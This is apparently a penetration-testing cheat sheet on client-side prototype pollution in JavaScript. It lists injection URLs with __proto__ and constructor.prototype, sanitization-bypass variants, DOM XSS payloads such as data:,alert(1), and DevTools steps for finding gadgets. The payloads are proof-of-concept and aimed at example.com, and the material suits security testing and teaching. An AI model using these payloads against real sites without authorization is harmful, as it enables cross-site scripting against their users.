Prototype Pollution in Client-Side

Prototype Pollution is a JavaScript vulnerability that allows attackers to add arbitrary prooperties to global object prototypes. The vulnerability may exist in Node.js applications.

- [client-side](https://portswigger.net/web-security/prototype-pollution/client-side)
- [client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution)

Investigation

Check if we can assign arbitrary property via URL.
Try various ways.

https://example.com/?__proto__[foo]=bar
https://example.com/?__proto__.foo=bar
https://example.com/?constructor.[prototype][foo]=bar
https://example.com/?constructor.prototype.foo=bar
# Bypass sanitization
https://example.com/?__pro__proto__to__[foo]=bar
https://example.com/?__pro__proto__to__.foo=bar
https://example.com/?constconstructorructor[prototype][foo]=bar
https://example.com/?constconstructorructor.prototype.foo=bar
https://example.com/?constconstructorructor[protoprototypetype][foo]=bar
https://example.com/?constconstructorructor.protoprototypetype.foo=bar

Open browser console, and type the following to check if our above property is assigned.

Object.prototype.foo
constructor.prototype.foo

// the expected output: "bar"


DOM XSS

If our payload affects an HTML element after loading, we can inject DOM-based XSS as below.
Assume the key name of the property is "source_url", whose value is loaded as "src" in a script element. What property name is defined might be found by investigating JavaScript code assigned in the website.

https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=alert(1)-


Finding Gadgets

  1. In browser, open DevTools and click the Sources (Chrome) or the Debugger (FireFox) tab, then find the JavaScript code which is affected by our pollution.
  2. When found the line of the code, click the line number at the left of the line to add a breakpoint. Then reload the page.
  3. The line that added as a breakpoint is highlighted. We can hover the target property to check the current value assigned.
  4. Adjust for executing our payload while checking the property's value.